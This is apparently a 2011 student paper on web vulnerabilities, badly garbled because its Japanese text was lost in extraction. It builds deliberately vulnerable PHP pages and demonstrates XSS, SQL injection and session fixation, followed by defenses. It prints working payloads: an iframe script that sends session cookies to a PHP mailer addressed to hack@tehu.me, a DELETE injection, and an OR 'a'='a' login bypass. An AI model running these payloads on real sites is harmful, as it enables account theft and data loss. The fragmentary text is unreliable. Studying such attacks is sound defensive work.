Web System Hacking XSS, SQL Injection and Session Fixation Attack p1. 0 : p2. 1 : p3. 2 : p8. 3 : p10. 4 : Century Font Courier New Font 0. CUI (Character User Interface) 6 (IPA) 2011 1 10 Web 2 Web 1969 (UCLA) (SRI) ARPANET () 1990 MicrosoftWindows 95 HTTP (HyperText Transfer Protocol) Web PHP, JavaScriptCGIPerl 8
109 XSS (Cross Site Scripting 3 ) () 1. 3 XSS (Cross Site Scripting) XSSWeb HTML<form> POSTPOST <iframe> 4 SQL Injection XSS Web SQL SQLSQL INSERT INTO table VALUE ($_POST[ name ]); 2 SF (Session Fixation Attack) PHP 1 ID (SID) ID ID ID 9
2. imac (mid 2009) Intel Core 2 Duo 2.93GHz 8GB VMWare FUSION 3.0 OS Ubuntu 11.04 2GB Apache HTTP Server 2.0 Oracle MySQL 5.5.14 Postfix 2.7.2 PHP 5.3 Vim 7.3 5 1XSS SOURCE1: FIRST XSS /xss/1/001.html <html> <head><title>xss1</title></head> <form action= 002.php method= post > name:<input type= text name= id ><br> <input type= submit value= send > </form></body></html> /xss/1/002.php <html> <head><title>xss1</title></head> <?php echo done:.$_post[ id ];?> </body></html> name: send Tehusend done: Tehu Javascript <script>alert(document.title);</script> done: <script>alert... XSS1 6 XSS done: <script>alert... HTML () () JavaScript done: <script>alert... done: <script>document.write(document.title); </script> done: XSS1 XSS 10
XSS CookieCookieWeb ID Cookie CookieJavaScript <script>alert(document.cookie);</script> Web JavaScript 7 XSSPOSTCookie Cookie SOURCE2: REAL XSS /xss/2/001.php <?php session_start();?> Keyword: <?php echo $_GET[ id ];?> </body> <form> URL session_start(); Session ID CookieURL XSS /xss/2/001.php?id=<script>alert(doc... Cookie PHPSESSID=64vis21ftdhjke5r1ba5sdgh... ID ID 8 Cookie Cookie 1 <iframe> /xss/2/900.html <html>secret virgin<br><br> <iframe width=320 height=100 src= 001.php?id=<script> window.location= 901.php?id= %2Bdocument.cookie;</script> > </iframe></body></html> 9 /xss/2/901.php <?php mb_language( Japanese ); mb_send_mail( hack@tehu.me, result, cookie:.$_get[ id ], From: cracked@tehu.me );?> attack was succeed!</body> Cookie 900.htmliframe 001.phpJavaScript Cookie Cookie901.phpPHP iframe 001.phpsessionCookie Cookie 001.php 900.html Cookie (ID, ID, ) 11
SNS Secret virgin 900.htmliframe width height attack was succeed! Cookie iframe width=0 height=0 XSS 10 1 SQL Injection Oracle MySQL hack InnoDB ikimono 10 DATABASE1: hack/ikimono id name birth --- - ------------- 1 Yoshiki Mizuno 1982 2 Kiyoe Yoshioka 1984 3 Hotaka Yamashita 1982 PHP SOURCE3: FIRST INJECTION /sql/1/001.php <?php $url = localhost ; $user = root ; $pass = tehutehu ; $db = hack ; $sql = SELECT * FROM ikimono WHERE birth=.$_get[ year ]; $link = mysql_connect($url,$user, $pass) or die("died"); $sdb = mysql_select_db($db,$link) or die("failed to select"); mysql_query("set names utf8"); $result = mysql_query($sql, $link) or die("failed to query ); mysql_close($link) or die( bad cl ); while($row=mysql_fetch_assoc($result)) { echo id:.$row[ id ]. name:. $row[ name ]. <br> ; }?> URL year=1982 /sql/1/001.php?year=1982 id:1 Name:Yoshiki Mizuno id:2 Name:Hotaka Yamashita 1984 Kiyoe Yoshioka 2011 SQL001.php6 SELECT * FROM ikimono WHERE birth= SQL 0;DELETE FROM ikimono DATABASE1: hack/ikimono (hacked) id name birth --- - ------------- Waring: this table doesn t have any records! 12
SQL 11 SQLikimono Web MySQL001.html 002.php DATABASE2: hack/login id name pass 12 --- ------ ---------- 1 tehu tehutehu 2 kinta tanki 3 kiyoe hotaka SOURCE4: REAL INJECTION /sql/2/001.html <html> <head><title>sql</title></head> <form action= 002.php method= post > name:<input type= text name= id ><br> pass:<input type= text name= pw ><br> <input type= submit value= send > </form></body></html> /sql/1/002.php <?php $id = $_POST[ id ]; $pw = $_POST[ pw ]; $url = localhost ; $user = root ; $pass = tehutehu ; $db = hack ; $sql = SELECT * FROM login WHERE name=.$id. AND pass=. $pw. ; $link = mysql_connect($url,$user, $pass) or die("died"); $sdb = mysql_select_db($db,$link) or die("failed to select"); mysql_query("set names utf8"); $result = mysql_query($sql, $link) or die("failed to query ); mysql_close($link) or die( bad cl ); if($row=mysql_fetch_assoc($result)){ echo process was done! ; } else { echo authentication was denied! }?> 001.html name: pass: send name:kinta pass:tanki process was done! name:tehu pass:debu authentication was denied! 002.phpSQL idpwsql nametehupass OR a = a process was done! SQL SELECT * FROM login WHERE name= tehu AND pass= OR a = a nametehupass aa aa 13
SQL pass SQL Injection XSSSQL Injection Web 1 Session Hijack 1) ID ID ID PICT1: SESSION ID HACKS UNIX Time ID Linux/dev/urandom ID 2) ID IDCookie XSSHTTP SIDURL HTTPReferer ID 3) ID ID ID ID ID SOURCE5: SESSION FIXATION /sid/1/.htaccess php_flag session.use_cookies On php_flag session.use_only_cookies Off php_flag session.use_trans_sid On /sid/1/001.php <?php session_start();?> <form action= 002.php method= POST > ID:<input name= id type= text ><br> <input type= submit value= Login > </form></body> /sid/1/002.php <?php session_start(); $id = $_POST[ id ]; $_SESSION[ id ] = $id;?> Hello, Mr/Mrs. <?php echo $id;?>!<br> <a href= 003.php >Your Info</a> </body> 14
/sid/1/003.php <?php session_start();?> Your Info<br> ID: <?php echo $_SESSION[ id ];?> </body>.htaccess 001.phpID 002.phpID ID php sendmailfrom Satoru Cho URL PHPSESSID ID 123ID http://example.jp/sid/1/003.php?phpsessid=123 Satoru Cho ID... 13 URL1.htaccess.htaccessID URL Cookie PHPSESSIDPHP ID ID 3. 3 XSS JavaScript <script>window.location= 901.php?id= %2Bdocument.cookie;</script> 14 15
PHP htmlspecialchars($p, ENT_QUOTES, UTF-8 ); 12 3 ENT_QUOTES 15 < < > > & & " ' <script>window.location=鯝.php? id='%2bdocument.cookie;</script> SOURCE6: REAL XSS (VER.2) /xss/2/001.php <?php session_start();?> Keyword: <?php echo htmlspecialchars($_get[ id ], ENT_QUOTES, UTF-8 );?> </body> 900.php ID XSS SQL Injection XSS JavaScriptSQL htmlspecialchars() addslashes($p); OR a = a Injection \ OR \ a\ =\ a SOURCE7: REAL INJECTION (VER.2) /sql/1/002.php <?php $id = $_POST[ id ]; $pw = $_POST[ pw ]; $url = localhost ; $user = root ; $pass = tehutehu ; $db = hack ; $sql = SELECT * FROM login WHERE name=.$id. AND pass=. addslashes($pw). ; $link = mysql_connect($url,$user, $pass) or die("died"); $sdb = mysql_select_db($db,$link) or die("failed to select"); mysql_query("set names utf8"); $result = mysql_query($sql, $link) or die("failed to query ); mysql_close($link) or die( bad cl ); if($row=mysql_fetch_assoc($result)){ echo process was done! ; } else { echo authentication was denied! }?> URL ID.htaccess SOURCE8: SESSION FIXATION (VER.2) /sid/1/.htaccess php_flag session.use_cookies Off php_flag session.use_only_cookies Off php_flag session.use_trans_sid Off URLCookie ID 16
4. XSS XSS5 JavaScript JavaScriptJavaScript Scheme javascript:alert(document.title) Google Google htmlspecialchars script XSS s/script/xscript/; <script> <xscript>javascript:javaxscript: XSS Internet Explorer expressioncssjavascript XSSXSS GoogleXSS SQL Injection SQL Injection addslashes() SQL URL GETPOST POST proxy Fiddler (Microsoft) POST 16 HTMLinputvalue Telnet POST intval() preg_match( /\d+/, $subject); SQL Injection SQL 17
SELECT * FROM table WHERE id= SELECT * FROM table WHERE id= =123456 =123456 SELECT * FROM table WHERE id=123456 SQL Injection SQL SQL SQL SQL SELECT * FROM table WHERE id =? SQL SQL? SQL SQL Injection 100%.htaccessURLCookie ID Cookie Cookie Internet Explorer 6 HTTP HTTP Referer Cookie ID ID PHPID session_regenerate_id(true); IDID IDID TokenCookie 17 CookieToken Token Cookie Token 18
Web (2011) Web GIJOE (2005) PHP Studying HTTP <http://www.studyinghttp.net/> 201184 XSS Challenges 18 <http://xss-quiz.int21h.jp/> 201184 <http://www.ipa.go.jp/security/vuln/> 201184 Web Copyright 2011 Sei Cho, All Rights Reserved. 19